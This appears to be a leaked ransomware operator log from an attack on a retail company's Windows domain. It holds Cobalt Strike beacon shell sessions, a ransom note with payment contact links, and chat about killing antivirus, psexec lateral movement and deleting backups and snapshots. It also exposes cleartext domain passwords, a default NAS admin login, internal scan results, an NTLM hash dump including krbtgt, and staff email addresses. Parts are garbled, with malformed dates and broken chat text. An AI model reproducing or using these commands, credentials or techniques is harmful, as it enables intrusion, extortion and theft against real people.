          dir 04/27/2016 01:35:59 Logs
          dir 02/28/2018 10:34:09:09 MATS
          dir 12/07/2019 03:14:52 PerfLogs
          dir 07/23/2020 22:38:46 Program Files
          dir 09/10/2020 11:54:42 Program Files (x86)
          dir 07/24/2020 09:52:37 ProgramData
          dir 07/23/2020 20:07:22 Recovery
          dir 03/26/2013 05:21:53 System Recovery
          dir 01/18/2021 19:16:12 System Volume Information
          dir 02/28/2014 15:06:33 Temp
          dir 07/23/2020 19:44:04 Users
          dir 01/13/2021 01:04:40 Windows
          dir 10/04/2016 11:30:40 WindowsUpdates Batch files
 1kb fil 01/19/2021 16:52:06 .rnd.WSFWM
 535b fil 01/19/2021 16:52:06 BOOTNXT.WSFWM
 28kb fil 01/18/2021 16:52:06 dell.sdr.WSFWM
 8kb fil 01/18/2021 09:15:14 DumpStack.log.tmp
 0b fil 06/21/2013 12:57:16
 6mb fil 04/12/2013 16:27:45 FSMMSILog.txt
 5gb fil 01/18/2021 09:15:12 hiberfil.sys
 476kb fil 01/05/2002 03:40:20 msvcp70.dll
 336kb fil 01/05/2002 03:37:28 msvcr70.dll
 8gb fil 01/18/2021 09:15:14 pagefile.sys
 930b fil 01/19/2021 16:52:06 readme.txt
 256mb fil 01/18/2021 09:15:14 swapfile.sys
 1kb fil 01/16/2015 12:21:09 tcg quaterly run.txt

beacon> shell dir C:\readme.txt
[*] Tasked beacon to run: dir C:\readme.txt
[+] host called home, sent: 48 bytes
[+] received output:
 Volume in drive C is OS
 Volume Serial Number is B825-1C82

 Directory of C:\

01/19/2021 04:52 PM 930 readme.txt
               1 File(s) 930 bytes
               0 Dir(s) 842,931,138,560 bytes free

beacon> shell type C:\readme.txt
[*] Tasked beacon to run: type C:\readme.txt
[+] host called home, sent: 49 bytes
[+] received output:
All of your files are currently encrypted.
Backups were encrypted or deleted, same as Shadow Copies.

If you try to use any additional recovery software - the files might be damaged, but if you are still willing to try - try it on the data of the lowest value.

To make sure that we REALLY CAN recover all of the encrypted data - we offer you to decrypt 2 random files of your choice completely free of charge.

The faster you reply - the easier and cheaper it will be.
To receive information on the price of the recovery software you can contact our team directly for further instructions through our website:

TOR VERSION :
(you should download and install TOR browser first https://torproject.org)

http://contirecj4hbzmyzuydyzrvm2c65blmvhoj2cvf25zqj2dwrrqcq5oad.onion/

HTTPS VERSION :
https://contirecovery.best

---BEGIN ID---
TZhuHwa9cdqOe3RnHObcHHHJFFVZUjBpwFXziFQud63TrrrLqJ3ikFUXJn1BfjYF
---END ID---


``We have to cut off the av and restart it.
DressinGaudy\canton GMC041985
DressinGaudy\corporate GCouture
DressinGaudy\DG108 Gaudy081
DressinGaudy\jmr 1515sasy
DressinGaudy\ROOK RR#2212
DressinGaudy\DG102 Gaudy021
DressinGaudy\GM103 Gaudy031
DressinGaudy\tim true0407
DressinGaudy\DG105 Gaudy051
DressinGaudy\GCPOS8A-TGM1 Password1
DressinGaudy\GM106 Gaudy061
DressinGaudy\GCPOS5A-LGM3 register
``Disconnect the micro)`` Yes, I already pulled[ ](https://mediaeveryone.com/group/gaudyme-com?msg=6biKzY5QiYNKbKihb) try to unshare the c$``.
172.16.1.247:7680
172.16.1.247:6783
172.16.1.247:5357
172.16.1.247:5040
172.16.1.247:2107
172.16.1.247:2105
172.16.1.247:2103
172.16.1.247:1801
172.16.1.247:139
172.16.1.247:135
172.16.1.247:80
172.16.1.247:445 (platform: 500 version: 10.0 name: ACCOUNTING2 domain: DRESSINGAUDY)
``Trend Micro Inc. should be shut down for an av[ ](https://mediaeveryone.com/group/gaudyme-com?msg=MtM65JGes69QGu2ov) ``what av? if another process won't jump into c$-but they were dropping out after 10-15 seconds-sessions, so I'm pulling wmic - rpc server is unavailable
do remote-exec psexec - everything okily you about psex?[ ](https://mediaeveryone.com/group/gaudyme-com?msg=q83XW27j2ohmjkmLC) ??? and rpc open? it works psex? strange that rpc does not work ``
Teemo[GAUDY-DC2]SYSTEM */2580|2021Jan20 01:33:12> shell net view \\172.16.1.247 /all
[*] Tasked beacon to run: net view \\172.16.1.247 /all
[+] host called home, sent: 59 bytes
[+] received output:
Shared resources at \172.16.1.247



Share name Type Used as Comment

-------------------------------------------------------------------------------
IPC$ IPC Remote IPC
print$ Disk Printer Drivers
The command completed successfully.

``rpc doesn't work at all rpc on the first one works?``
Accounting2.DressinGaudy.local: 172.16.1.247 on disk access says no name found
Label.DressinGaudy.local: 172.16.1.61 is
DGW-PC.DressinGaudy.local: 172.16.1.83 is
Gaudy-DC2.DressinGaudy.local: 169.254.32.72 is
GAUDY-RDP1.DressinGaudy.local: 172.16.1.15 is the same computer as above
Gaudy-DC2.DressinGaudy.local: 169.254.113.11 is the same computer as the above two
Gaudy-DC2.DressinGaudy.local: 169.254.196.198 is the same computer as the three above
Gaudy-DC2.DressinGaudy.local: 172.16.1.15 is the same computer as the four above
GM-Tyler-Office.DressinGaudy.local: 192.168.1.103 is
MikaDesktop.DressinGaudy.local: 192.168.2.149 is
``And there were 7(5) how many total pc's?
[*] Listing: C:\

 Size Type Last Modified Name
 ---- ---- ------------- ----
          dir 01/19/2021 16:18:48 $GetCurrent
          dir 11/02/2020 15:50:17 $Recycle.Bin
          dir 01/19/2021 16:18:49 $SysReset
          dir 01/19/2021 16:18:49 $WinREAgent
          dir 01/19/2021 16:18:52 _FedEx
          dir 01/19/2021 16:18:49 AMD
          dir 01/19/2021 16:18:49 ATI
          dir 01/19/2021 16:18:49 DG
          dir 07/14/2009 00:08:56 Documents and Settings
          dir 01/19/2021 16:18:50 ESD
          dir 01/19/20/2021 16:18:50 FedEx
          dir 01/19/2021 16:18:50 Logs
          dir 01/19/20/2021 16:18:50 MSOCache
          dir 01/19/2021 16:18:51 New Pics
          dir 12/07/2019 03:14:52 PerfLogs
          dir 01/19/2021 16:18:51 Program Files
          dir 01/19/2021 16:18:51 Program Files (x86)
          dir 01/19/2021 16:18:51 ProgramData
          dir 01/19/20/2021 16:18:51 Recovery
          dir 01/19/20/2021 16:18:44 System Volume Information
          dir 02/02/2015 15:03:13 temp
          dir 01/19/2021 16:18:52 Users
          dir 01/19/2021 14:41:20 Windows
          dir 12/06/2019 09:34:02 Windows10Upgrade
 1kb fil 01/19/2021 16:18:48 .rnd.WSFWM
 535b fil 01/19/2021 16:18:48 BOOTNXT.WSFWM
 947kb fil 01/19/2021 16:18:48 count_log_out.txt.WSFWM
 8kb fil 01/13/2021 02:10:14 DumpStack.log.tmp
 7mb fil 01/19/2021 16:18:48 FSMMSILog.txt.WSFWM
 11gb fil 01/13/2021 02:10:10 hiberfil.sys
 883kb fil 12/01/2006 22:37:14 msdia80.dll
 15gb fil 01/13/2021 02:10:14 pagefile.sys
 1kb fil 01/19/2021 16:18:48 SOCIAL-MEDIIA1.txt.WSFWM
 34b fil 09/26/2016 11:55:16 Start Windows Updates.bat
 32b fil 09/26/2016 11:54:46 Stop Windows Updates.bat
 256mb fil 01/13/2021 02:10:14 swapfile.sys
``Leaving the files encrypted, why does he not leave a note more? Are we ok? There are no disks as if there is no account, but the hostnames are all there, I pinged all the rest? All 5 machines are pulled, all ready?
Accounting2.DressinGaudy.local: 172.16.1.247
Label.DressinGaudy.local: 172.16.1.61
DGW-PC.DressinGaudy.local: 172.16.1.83
Gaudy-DC2.DressinGaudy.local: 169.254.32.72
GAUDY-RDP1.DressinGaudy.local: 172.16.1.15
Gaudy-DC2.DressinGaudy.local: 169.254.113.11
Gaudy-DC2.DressinGaudy.local: 169.254.196.198
Gaudy-DC2.DressinGaudy.local: 172.16.1.15
GM-Tyler-Office.DressinGaudy.local: 192.168.1.103
MikaDesktop.DressinGaudy.local: 192.168.2.149

Is everything ready? 1TB - delete in 5 minutes. My screenshot above is exactly all there is, delete snaps, etc. Read all what is there and so what is complete? Still do completely) files that are in 2013-2015terabyte drive and default login password. it is doubtful that something good was there.
QNAP Turbo NAS
http://172.16.1.14:8080/cgi-bin/
admin
admin
QNAP Turbo NAS only find us, there is one server and half of the company, I think the files will not collect, here under 0 can you close? I think all hereuser9user4@tl1 Give everyone here) avsix.com nothing pulls there some nonsense ``
172.16.1.10
172.16.1.15
172.16.1.74
172.16.1.55
172.16.1.244
172.16.1.71
172.16.1.248
172.16.1.75
172.16.1.248
172.16.1.76
172.16.1.242
192.168.1.103
172.16.1.247
172.16.1.85
172.16.1.75
172.16.1.61
172.16.1.62
192.168.2.149
172.16.1.83
172.16.1.78
172.16.1.71
``user7 should be @user7
@user3 is busy here with @user3 let's go to random whatever you want to help? > on all of them yes sniper gave
>[-] Invoke_3 on EntryPoint failed.then reserch admins)or uzakili adminroot there's a passthrough there passvot clears yes by the way
```
DressinGaudy\canton GMC041985
DressinGaudy\corporate GCouture
DressinGaudy\DG108 Gaudy081
DressinGaudy\jmr 1515sasy
DressinGaudy\ROOK RR#2212
DressinGaudy\DG102 Gaudy021
DressinGaudy\GM103 Gaudy031
DressinGaudy\tim true0407
DressinGaudy\DG105 Gaudy051
DressinGaudy\GCPOS8A-TGM1 Password1
DressinGaudy\GM106 Gaudy061
DressinGaudy\GCPOS5A-LGM3 register
DressinGaudy\GCPOS4A-LGM2 register
DressinGaudy\GCPOS3A-LGM1 register
DressinGaudy\GCPOS17A-LDG1 register
DressinGaudy\GCPOS18A-LDG2 register
DressinGaudy\GCPOS10A-TGM3 register
DressinGaudy\GCPOS11A-CDG1 register
DressinGaudy\GCPOS12A-CDG2 register
DressinGaudy\GCPOS13A-CDG3 register
DressinGaudy\GCPOS1A-TDG1 register
DressinGaudy\GCPOS2A-TDG2 register
DressinGaudy\GCPOS6A-TXDG1 register
DressinGaudy\GCPOS7A-TXDG2 register
DressinGaudy\GCPOS9A-TGM2 register
DressinGaudy\GCPOS9A-TGM2 register
```
[-] Invoke_3 on EntryPoint failed.
``````
192.168.2.164 - did not open
172.16.1.11 - avaya, telephony
172.16.1.20 - canon iR-ADV C2225i
172.16.1.22 - HP LaserJet M402n
172.16.1.58 - HP OfficeJet Pro 8710

172.16.1.14 - us, qnap
``There's a hell of a lot of trouble,``
```
172.16.1.58:443
172.16.1.22:443
172.16.1.20:443
172.16.1.14:443
172.16.1.11:443
 
172.16.1.14:22 (SSH-2.0-OpenSSH_7.3)
172.16.1.1:22 (SSH-2.0-OpenSSH_7.2)
 
172.16.1.12:445
172.16.1.14:445 (platform: 500 version: 6.1 name: GAUDY-LOCAL domain: WORKGROUP)
172.16.1.15:445 (platform: 500 version: 10.0 name: GAUDY-DC2 domain: DRESSINGAUDY)
172.16.1.61:445 (platform: 500 version: 10.0 name: LABEL domain: DRESSINGAUDY)
172.16.1.83:445 (platform: 500 version: 10.0 name: DGW-PC domain: DRESSINGAUDY)
172.16.1.247:445 (platform: 500 version: 10.0 name: ACCOUNTING2 domain: DRESSINGAUDY)
```
```
192.168.1.103:445 (platform: 500 version: 10.0 name: GM-TYLER-OFFICE domain: DRESSINGAUDY)
```
```
192.168.2.164:443
192.168.2.149:445 (platform: 500 version: 10.0 name: MIKADESKTOP domain: DRESSINGAUDY)
192.168.2.164:445 (platform: 500 version: 6.2 name: EPSONCB1B7F domain: WORKGROUP)
``````
dn:CN=Backup Operators,CN=Builtin,DC=DressinGaudy,DC=local
>objectClass: top
>objectClass: group
>cn: Backup Operators
>description: Backup Operators can override security restrictions for the sole purpose of backing up or restoring files
>distinguishedName: CN=Backup Operators,CN=Builtin,DC=DressinGaudy,DC=local
>instanceType: 4
>whenCreated: 20140219183137.0Z
>whenChanged: 20180215190335.0Z
>uSNCreated: 13360
>uSNChanged: 13360
>name: Backup Operators
>objectGUID: {3E590A3C-D066-458B-BA24-74240463D912}
>objectSid: S-1-5-32-551
>adminCount: 1
>sAMAccountName: Backup Operators
>sAMAccountType: 536870912
>systemFlags: -1946157056
>groupType: -2147483643
>objectCategory: CN=Group,CN=Schema,CN=Configuration,DC=DressinGaudy,DC=local
>isCriticalSystemObject: TRUE
>dSCorePropagationData: 16010101000000.0Z
``Scan to 445 and to the web their sabnetsaha also noticed such a man is there
```
>sAMAccountName: VMPro
>memberOf: CN=Warehouse,OU=DressinGaudy_Users,DC=DressinGaudy,DC=local
``````
[DC] 'DressinGaudy.local' will be the domain
[DC] 'Gaudy-DC2.DressinGaudy.local' will be the DC server
[DC] Exporting domain 'DressinGaudy.local'
1185 GAUDY-RDP1$ c4c6b3a3fa322dfb74dfb692fffb1aa54c7 532480
1119 SOCIAL-MEDIIA1$ 5f3854e8bd9d3aa5f68cb807b7891c22 4096
1114 BRITTANI-PC$ 5d8a95512df9e719207a0ed7686c417e 4096
1118 SOCIAL-MEDIA1$ cc9f2f930553c8516b2fc61f37f04910 4096
1107 CORPORATE-LAPTO$ 8bd91dcc12602c157f58b5d43b00d4ef 4096
1177 canon 8ef62adbb9127aa5cb4ddc8ceb483994 66048
1186 CORPORATE-DESKT$ 05a2b95c896aa1e365a78493f97036c0 4096
1110 QBDataServiceUser24 5c275327b45004dbb777866feacb7c44 66048
1237 QBDataServiceUser27 7e62fb7999eb74ee272401b607f1f110 66048
1147 DGLONGVIEW-PC$ e52b1d43fb366fe99fcc638a4730103b 4096
1606 GCPOS5A-LGM3 d29b9f741a059cde7e9ddfed5701ced7 66050
1605 GCPOS4A-LGM2 d29b9f741a059cde7e9ddfed5701ced7 66050
1604 GCPOS3A-LGM1 d29b9f741a059cde7e9ddfed5701ced7 66050
1234 GCPOS17A-LDG1 d29b9f741a059cde7e9ddfed5701ced7 66050
1235 GCPOS18A-LDG2 d29b9f741a059cde7e9ddfed5701ced7 66050
1610 GCPOS10A-TGM3 d29b9f741a059cde7e9ddfed5701ced7 66050
1611 GCPOS11A-CDG1 d29b9f741a059cde7e9ddfed5701ced7 66050
1612 GCPOS12A-CDG2 d29b9f741a059cde7e9ddfed5701ced7 66050
1613 GCPOS13A-CDG3 d29b9f741a059cde7e9ddfed5701ced7 66050
1601 GCPOS1A-TDG1 d29b9f741a059cde7e9ddfed5701ced7 66050
1603 GCPOS2A-TDG2 d29b9f741a059cde7e9ddfed5701ced7 66050
1607 GCPOS6A-TXDG1 d29b9f741a059cde7e9ddfed5701ced7 66050
1608 GCPOS7A-TXDG2 d29b9f741a059cde7e9ddfed5701ced7 66050
1609 GCPOS8A-TGM1 64f12cddaa88057e06a81b54e73b949b 66050
1602 GCPOS9A-TGM2 d29b9f741a059cde7e9ddfed5701ced7 66050
1210 allisonp 47b178d121cd3bab2192988418dfc888 66050
1217 social 48ae08e40717fc5d1075610f5a6d14f0 66048
1220 order 64ad7b9e2614ff9b9082025ff12976fe 66050
1229 sabrinah 48ae08e40717fc5d1075610f5a6d14f0 66050
502 krbtgt 231b0468e1c72213ef935e8cb4b4906f 514
1113 QBPOSDBSrvUser 90d145e86ae9f78a6e61d1fec6cfbb5f 66048
1214 ROOK 0d1d3a9a35ad2c91b12b9e0a9a9a83e169 66050
1219 Shopthegaudysite 64ad7b9e2614ff9b9082025ff12976fe 66050
1197 receiving2 3be8bfea417bb754d098159f04dbc239 66050
1244 VMPro d5d2270b5b056635450ab6139ff44db9 66048
1222 Careers 64ad7b9e2614ff9b9082025ff12976fe 66048
1221 admin 64ad7b9e2614ff9b9082025ff12976fe 66048
1146 jpu c6e4af5358661caf7a1e5d5a1d7f771b 66048
1241 gaudy 72bb5d55d77daf7721d92f80974a716d4 66048
1161 ncp fe64f8d8957e7236a923810afc8002c4 66048
1188 Info 41c3a27426f8b504ddcdc54dbf9ac6e3 66048
1215 sales 64ad7b9e2614ff9b9082025ff12976fe 66048
1223 orders ec659a6bff5d09327e805a2faf06fc94 66048
1239 orders 64f12cddaa88057e06a81b54e73b949b 66048
1157 hbt bbd870afdcc36d200a739c193eed5e6d 66048
1216 CustomerService ec659a6bff5d09327e805a2faf06fc94 66048
1159 klm b1677919e2aa45ba57959305e76a5946 66048
2105 grantp fdb219f9e944f46ef3aeec0686917e86 66048
503 DefaultAccount 31d6cfe0d16ae931b73c59d7e0c089c0 514
1195 SOCIALMEDIA1$ c83ce529704a20e431c48e000caaf0cb 4096
1168 SOCIALMEDIA3$ dfd33f42d4cfe4263069b1520ab2d898 4096
1616 MIKALAPTOP$ dc8b3717fe624123307cc1cea924b7b6 4096
1238 CORPORATE2$ e842adcc65fb28f339df23841037da51 4096
1236 madisonc 989a6a62caf5177d82ae02ba3c9c0eb0 66050
1192 GM103 ff6baa1584e0f920a1224947ee436067 66048
1108 emm 9ef20ca8484efe69a7197730a9b8badc 66048
1231 LeahP b080b686db8076775a51272b8a07f419 66050
2117 cooperm 81cd9c07ca5bdc15ed2dde1d45cccef7 66048
1242 QBDataServiceUser28 f9afe04ed33db257f4f6e4a126aa6003 66048
2118 QBDataServiceUser29 560e002747f32bf8dc26005978fefa3e 66048
1240 kaylab 285da02342607559528b49ae60d909b3 66048
1233 DG108 ece4a880865e765d57733539931b334b 66048
1191 GM106 3ea7b213b7e25cc0cce68803303952b5 66048
1155 bdc 872d591814c3eb168a120d4067888885 66048
1619 GCPOS16A$ 9997926294c6ee5932a5ebd94f0f8355 4096
1218 Breer efa36a734a1aba14b95bcd0f9ceb1610 66048
1194 MeaganC 662ce6b8aa70d5ed8f96b25d98c3743b 66048
1000 GAUDY-DC1$ 02fab4f0918492e698ae8b519a992fa7 4096
2106 SOCIAL3$ 517ab1040e57c71cdd9eb021318335e2 4096
1106 jmr 554193c8030f36f98504a0fdfb63b3ba 66048
1224 DG-TYLER-OFFICE$ 147e9e3fd70aa5f9fe99c9880199e543 4096
2114 socialmedia3 d14687e5eebe9af70f2e30d49f4759ea 66048
1227 GCPOS15A$ 4f87b85d2fb489f3f4cd927d51d85d06 4096
1190 DG102 2c5c4e9f4ba709322f13f7df92619dd6 66048
1226 GCPOS14A$ 774454456817213d7882483d4eb3f910 4096
1620 POS14 64f12cddaa88057e06a81b54e73b949b 66048
2115 MackenziD 87c7bec5244e04ff5286b332f7a534dd 66048
1621 pos15 64f12cddaa88057e06a81b54e73b949b 66048
1622 POS16 64f12cddaa88057e06a81b54e73b949b 66048
1109 JENIRAMSEY-PC$ 837dadb16d5fbe52eeb431e871bbfd6a 4096
1193 DG105 a733b31bc8855948eef5217fb77e6837 66048
2121 kimw 8908a802d83a41c2178c47dbb53cf1c1 66048
1163 texarkana a733b31bc8855948eef5217fb77e6837 66048
1618 DG-TEX-OFFICE$ 878b13be8f93134e0f115ee09d0dfdd8 4096
2120 larkinp 8837daf55148dcc8352a67b761c37e8e 66048
1617 SHIPPING$ 02c10a5073b82fe6782582a3ddea72f8 4096
1245 OWNER-PC$ 70cad180b2e3f00380211e955197dd43 4096
1230 DGLongview ece4a880865e765d57733539931b334b 66048
1160 longview ff6baa1584e0f920a1224947ee604367 66048
1170 corporate 91631b2dba583d2133168dcefa82bc63 66048
1614 CORPORATE$ 6927c73ce468477e647563063937f2b4 4096
2113 clittleton 5f2f93f575aef31552177a4e70b4980e 66048
1202 sharies 866f661b57f5f233e10fdd1569980c44 66048
2125 meganl 5965d4ddc4bde0f6fcb32fb07a1a625b 66048
2122 teresac 78b5fb4330f3807604e449a52af8b5ad 66050
2108 SOCIAL2$ 5cc5391f1c26ff59544b474f47ef0477 4096
1165 socialmedia1 933062fa0aee8303a48f070887208732 66048
2107 SOCIAL1$ 47a04b5e303b009aa595cd47f47eb7ab 4096
2126 QBDataServiceUser31 894d6d5d1a0478e345d2e6f07cfdd779 66048
2123 cindyh e2e9a2a7db389a08cfbfc8be07d6d989 66048
2111 Rockwall a3498136f2eb7322d7589605346386c5 66048
2112 ROCKWALL-BACKOF$ edb60636f3d2fc8581decf3a360ccb2f 4096
1615 RECEIVING$ f7610b6b98fe11093b08652cb4274bac 4096
2119 magenl 5965d4ddc4bde0f6fcb32fb07a1a625b 66048
1228 website 0bd318c29d9542e09abbee52463a46fb 66048
2109 Katelync 9647b5f0f1136f99333939a3373f0899 66048
1207 Label 873e50fd637d0d3ded9af361d32d8d62 66048
1199 label 81cd9c07ca5bdc15ed2dde1d45cccef7 66048
1243 GAUDY-DC2$ f57e713d19f3c2f5e24627014549951e 532480
1225 GM-TYLER-OFFICE$ fef8461129278327173160d4a2a4d01c 4096
2124 destineeg bd3d4fbd9e1f03c50106eeee4b54823c 66048
500 Administrator 2bebaecfce9530051a337ca7a299c71c 512
1145 dat 5e481f285545336512794748d10e16b9 66048
1123 MIKADESKTOP$ 903fe4d75fb8fe136d1ff892860704f3 4096
1121 socialmedia2 60cafefefc6658a34bc7032d29f7614032 66048
1122 LABEL$ f2790a191d89f81727076a650bdba797 4096
1623 DGW-PC$ f7faedbd9e2968e9b9421fc4d8c80662 4096
1153 dg 2c5c4e9f4ba709322f13f7df92619dd6 66048
1117 ACCOUNTING2$ 9bdded5eb425b9a551ca0277086f2d01 4096
1164 tyler 3ea7b213b7e25cc0cce68803303952b5 66048
1148 tim 0746a084694c267c15fe9c1081b05cf9 66048
1175 canton 399f140089c0e3d11c7b8267d11eb011 66048
``3 in quotation marks is
```
GAUDY-RDP1.DressinGaudy.local
Gaudy-DC2.DressinGaudy.local
"`` Gaudy-DC1.DressinGaudy.local''
```
1 and 2 on the same IP
"3" ``Destination host unreachable.`` It's not "3" servers and by the way don't keep one session if it's dropping...so go somewhere else to rerisk it, there was such a thing last time
>request ad_ous or ad_group - the session crashes
ignore them or reset? probably clean the toolspanel last time also reset and what do you do? right? i'll reset dsink, hell, check again for backups and can close in principle, if the latter is not detected at once does not work, dohda
```
DressinGaudy\canton GMC041985
``````
DressinGaudy.local
``update info to net domainDGW-PC? let's silkcodnoe koba that's not there I think I put in a long slip do you have a session here? need to check the ping as far as I remember there are no backups at all it just get injected so you could then close@user8 call you so there's a small fucked up grid and it should be, but here is a couple>mail: VMPro@gaudyme.com```
>proxyAddresses: SMTP:Administrator@gaudyme.com
>proxyAddresses: smtp:Administrator@dressingaudy.local
>userPrincipalName: Administrator@DressinGaudy.local
>mail: Administrator@gaudyme.com
>userPrincipalName: POS14@DressinGaudy.local
>userPrincipalName: POS16@DressinGaudy.local
>userPrincipalName: pos15@DressinGaudy.local
>userPrincipalName: GCPOS4A-LGM2@DressinGaudy.local
>proxyAddresses: SMTP:tim@gaudyme.com
>proxyAddresses: smtp:tim@dressingaudy.local
>userPrincipalName: tim@DressinGaudy.local
>mail: tim@gaudyme.com
>userPrincipalName: GCPOS11A-CDG1@DressinGaudy.local
>userPrincipalName: GCPOS10A-TGM3@DressinGaudy.local
>userPrincipalName: GCPOS18A-LDG2@DressinGaudy.local
>userPrincipalName: GCPOS9A-TGM2@DressinGaudy.local
>userPrincipalName: DG108@DressinGaudy.local
>userPrincipalName: GCPOS2A-TDG2@DressinGaudy.local
>userPrincipalName: GCPOS12A-CDG2@DressinGaudy.local
>proxyAddresses: SMTP:longview@gaudyme.com
>proxyAddresses: smtp:longview@dressingaudy.local
>userPrincipalName: longview@DressinGaudy.local
>mail: longview@gaudyme.com
>userPrincipalName: GM106@DressinGaudy.local
>userPrincipalName: DG102@DressinGaudy.local
>userPrincipalName: GCPOS13A-CDG3@DressinGaudy.local
>proxyAddresses: smtp:accounting@gaudyme.com
>proxyAddresses: smtp:david@gaudyme.com
>proxyAddresses: SMTP:jeni@gaudyme.com
>proxyAddresses: smtp:jeni@dressingaudy.local
>userPrincipalName: jmr@DressinGaudy.local
>mail: jeni@gaudyme.com
>userPrincipalName: GCPOS6A-TXDG1@DressinGaudy.local
>userPrincipalName: GCPOS1A-TDG1@DressinGaudy.local
>proxyAddresses: smtp:canton@dressingaudy.local
>proxyAddresses: SMTP:canton@gaudyme.com
>userPrincipalName: canton@DressinGaudy.local
>mail: canton@gaudyme.com
>userPrincipalName: ROOK@DressinGaudy.local
>proxyAddresses: SMTP:brianna@gaudyme.com
>proxyAddresses: smtp:brianna@dressingaudy.local
>userPrincipalName: bdc@DressinGaudy.local
>mail: brianna@gaudyme.com
>userPrincipalName: GCPOS17A-LDG1@DressinGaudy.local
>userPrincipalName: GCPOS3A-LGM1@DressinGaudy.local
>userPrincipalName: DG105@DressinGaudy.local
>userPrincipalName: GCPOS5A-LGM3@DressinGaudy.local
>proxyAddresses: SMTP:Breer@gaudyme.com
>proxyAddresses: smtp:Breer@dressingaudy.local
>userPrincipalName: Breer@DressinGaudy.local
>mail: Breer@gaudyme.com
>userPrincipalName: GCPOS7A-TXDG2@DressinGaudy.local
>proxyAddresses: smtp:corporate@dressingaudy.local
>proxyAddresses: SMTP:corporate@gaudyme.com
>userPrincipalName: corporate@DressinGaudy.local
>mail: corporate@gaudyme.com
>userPrincipalName: GM103@DressinGaudy.local
>userPrincipalName: GCPOS8A-TGM1@DressinGaudy.local
>proxyAddresses: SMTP:FederatedEmail.4c1f4d8b-8179-4148-93bf-00a95fa1e042@gaudyme.com
>proxyAddresses: smtp:FederatedEmail.4c1f4d8b-8179-4148-93bf-00a95fa1e042@dressingaudy.local
>userPrincipalName: FederatedEmail.4c1f4d8b-8179-4148-93bf-00a95fa1e042@DressinGaudy.local
>mail: FederatedEmail.4c1f4d8b-8179-4148-93bf-00a95fa1e042@gaudyme.com
>proxyAddresses: SMTP:SystemMailbox{1f05a927-8705-43d0-94dd-0810ef6db452}@gaudyme.com
>proxyAddresses: smtp:SystemMailbox{1f05a927-8705-43d0-94dd-0810ef6db452}@dressingaudy.local
>userPrincipalName: SystemMailbox{1f05a927-8705-43d0-94dd-0810ef6db452}@DressinGaudy.local
>mail: SystemMailbox{1f05a927-8705-43d0-94dd-0810ef6db452}@gaudyme.com
>proxyAddresses: SMTP:SystemMailbox{e0dc1c29-89c3-4034-b678-e6c29d823ed9}@gaudyme.com
>proxyAddresses: smtp:SystemMailbox{e0dc1c29-89c3-4034-b678-e6c29d823ed9}@dressingaudy.local
>userPrincipalName: SystemMailbox{e0dc1c29-89c3-4034-b678-e6c29d823ed9}@DressinGaudy.local
>mail: SystemMailbox{e0dc1c29-89c3-4034-b678-e6c29d823ed9}@gaudyme.com
>proxyAddresses: SMTP:DiscoverySearchMailbox{D919BA05-46A6-415f-80AD-7E09334BB852}@gaudyme.com
>proxyAddresses: smtp:DiscoverySearchMailbox{D919BA05-46A6-415f-80AD-7E09334BB852}@dressingaudy.local
>userPrincipalName: DiscoverySearchMailbox {D919BA05-46A6-415f-80AD-7E09334BB852}@DressinGaudy.local
>mail: DiscoverySearchMailbox{D919BA05-46A6-415f-80AD-7E09334BB852}@gaudyme.com
>proxyAddresses: SMTP:debbie@gaudyme.com
>proxyAddresses: smtp:debbie@dressingaudy.local
>userPrincipalName: dat@DressinGaudy.local
>mail: debbie@gaudyme.com
>proxyAddresses: SMTP:dg@gaudyme.com
>proxyAddresses: smtp:dg@dressingaudy.local
>userPrincipalName: dg@DressinGaudy.local
>mail: dg@gaudyme.com
>proxyAddresses: SMTP:holly@gaudyme.com
>proxyAddresses: smtp:holly@dressingaudy.local
>userPrincipalName: hbt@DressinGaudy.local
>mail: holly@gaudyme.com
>proxyAddresses: SMTP:johnie@gaudyme.com
>proxyAddresses: smtp:johnie@dressingaudy.local
>userPrincipalName: jpu@DressinGaudy.local
>mail: johnie@gaudyme.com
>proxyAddresses: SMTP:kyli@gaudyme.com
>proxyAddresses: smtp:kyli@dressingaudy.local
>userPrincipalName: klm@DressinGaudy.local
>mail: kyli@gaudyme.com
>proxyAddresses: SMTP:mika@gaudyme.com
>proxyAddresses: smtp:mika@dressingaudy.local
>userPrincipalName: emm@DressinGaudy.local
>mail: mika@gaudyme.com
>proxyAddresses: SMTP:naia@gaudyme.com
>proxyAddresses: smtp:naia@dressingaudy.local
>userPrincipalName: ncp@DressinGaudy.local
>mail: naia@gaudyme.com
>proxyAddresses: SMTP:texarkana@gaudyme.com
>proxyAddresses: smtp:texarkana@dressingaudy.local
>userPrincipalName: texarkana@DressinGaudy.local
>mail: texarkana@gaudyme.com
>proxyAddresses: SMTP:tyler@gaudyme.com
>proxyAddresses: smtp:tyler@dressingaudy.local
>userPrincipalName: tyler@DressinGaudy.local
>mail: tyler@gaudyme.com
>proxyAddresses: smtp:Info@dressingaudy.local
>proxyAddresses: SMTP:Info@gaudyme.com
>userPrincipalName: Info@DressinGaudy.local
>mail: Info@gaudyme.com
>userPrincipalName: canon@DressinGaudy.local
>proxyAddresses: smtp:Receiving2@dressingaudy.local
>proxyAddresses: SMTP:Receiving2@gaudyme.com
>userPrincipalName: receiving2@DressinGaudy.local
>mail: Receiving2@gaudyme.com
>proxyAddresses: smtp:receiving@dressingaudy.local
>proxyAddresses: SMTP:receiving@gaudyme.com
>userPrincipalName: receiving1@DressinGaudy.local
>mail: receiving@gaudyme.com
>proxyAddresses: SMTP:sharies@gaudyme.com
>proxyAddresses: smtp:sharis@gaudyme.com
>proxyAddresses: smtp:sharies@dressingaudy.local
>proxyAddresses: smtp:sharis@dressingaudy.local
>userPrincipalName: sharies@DressinGaudy.local
>mail: sharies@gaudyme.com
>userPrincipalName: Label@DressinGaudy.local
>userPrincipalName: allisonp@DressinGaudy.local
>mail: allisonp@gaudyme.com
>proxyAddresses: smtp:social3@gaudyme.com
>proxyAddresses: SMTP:katies@gaudyme.com
>proxyAddresses: smtp:social3@dressingaudy.local
>userPrincipalName: MeaganC@DressinGaudy.local
>mail: meaganc@gaudyme.com
>proxyAddresses: smtp:CustomerService@gaudyme.com
>proxyAddresses: SMTP:customerservice@shopthegaudy.com
>proxyAddresses: smtp:CustomerService@dressingaudy.local
>userPrincipalName: CustomerService@DressinGaudy.local
>mail: customerservice@shopthegaudy.com
>proxyAddresses: smtp:sales@gaudyme.com
>proxyAddresses: SMTP:sales@shopthegaudy.com
>proxyAddresses: smtp:sales@dressingaudy.local
>userPrincipalName: sales@DressinGaudy.local
>mail: sales@shopthegaudy.com
>proxyAddresses: smtp:Social@dressingaudy.local
>proxyAddresses: SMTP:Social@gaudyme.com
